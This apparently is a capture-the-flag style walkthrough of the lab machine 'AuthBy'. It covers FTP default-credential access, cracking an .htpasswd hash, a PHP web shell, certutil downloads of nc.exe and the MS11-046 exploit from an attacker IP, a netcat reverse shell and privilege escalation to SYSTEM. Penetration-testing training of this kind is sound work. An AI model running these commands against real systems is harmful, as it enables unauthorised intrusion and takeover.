# AuthBy ## Information Gathering `sudo ./nmapAutomator.sh 192.168.216.46 all` ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FshqOeYlfWG9KmIpwwvMq%2Fimage.png?alt=media\&token=562a645c-79b6-4066-9b9c-1ebd44f055f9) ### Service Enumeration ### FTP (Port 21) We see that there are a few accounts: Offsec, anonymous, and admin. ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FQqVi3KPSnp7RHAYt43cY%2Fimage.png?alt=media\&token=8e7e43f6-4bf2-4d9b-8ffc-b0de1d4602e5) Looks like `admin:admin` gives us access to some files. We can download any file we have access to using: `wget -m ftp://admin:admin@192.168.216.46` ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FZmxNWJNyX2z6J2nj3yyJ%2Fimage.png?alt=media\&token=4e745c16-b820-4d33-be64-5e01ba824bc4) ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FLkoGiKKDCT1kfkS5R2VY%2Fimage.png?alt=media\&token=d8f48093-7630-44dd-8558-7be1938dbfb2) Looks like `.htpasswd` contains login credentials for `offsec` user account. We use john here to crack it. ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FPGBZL6aflhgoZFXtI6CM%2Fimage.png?alt=media\&token=5a7f3cae-418c-4f9e-b8ae-9c5963ee2df1) From here, we get `offsec:elite` for HTTP server on port 242. ### HTTP (Port 242) ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FiUDrEY3O1WNuCQwpEAjL%2Fimage.png?alt=media\&token=89eec85f-e9ac-484b-b222-4cb593dfbe89) ## Exploit We can transfer our `shell.php` which contains the following: {% code title="shell.php" %} ```php ``` {% endcode %} ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FJoTBtTXrSv3hfl6T4L6D%2Fimage.png?alt=media\&token=c2748bf0-04f5-40f1-9f8d-e91ebd80366f) We then transfer `nc.exe` to the target machine. `http://192.168.216.46:242/shell.php?cmd=certutil%20-urlcache%20-split%20-f%20http://192.168.49.216/home/kali/pg/authby/payloads/nc.exe%20nc.exe` ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FolOCLfCJ5iY70z4FQepr%2Fimage.png?alt=media\&token=020be7e2-974b-4037-be7d-394a51bd321a) ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F3BekcKBbRp2lktA2u71m%2Fimage.png?alt=media\&token=9bc4ea92-0fab-4a6a-a41b-ee380c7eabfc) Now that we have `nc.exe` on the target machine, we can get our reverse shell. `nc.exe -e cmd.exe 192.168.49.216 80` ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FyOqTKpHxwFV2REVJKKVJ%2Fimage.png?alt=media\&token=9b41a445-7a22-466b-8ab3-227db1efb4d8) ## Privesc We can transfer winPEAS to the target machine and run it. ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FI1mehIA27GSFWd6WaT4q%2Fimage.png?alt=media\&token=5ada4171-1e05-4886-893a-803b4e759187) {% embed url="" %} {% embed url="" %} We can transfer the exploit to the target machine using the following command: `cmd.exe /c certutil -urlcache -split -f http://192.168.49.216/home/kali/pg/authby/windows-kernel-exploits/MS11-046/ms11-046.exe ms11-046.exe` We run the executable, and we get SYSTEM. ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FExXXBuXDZInW5uSr9twG%2Fimage.png?alt=media\&token=e5fa40b7-e716-4ede-9e02-2092689116d8)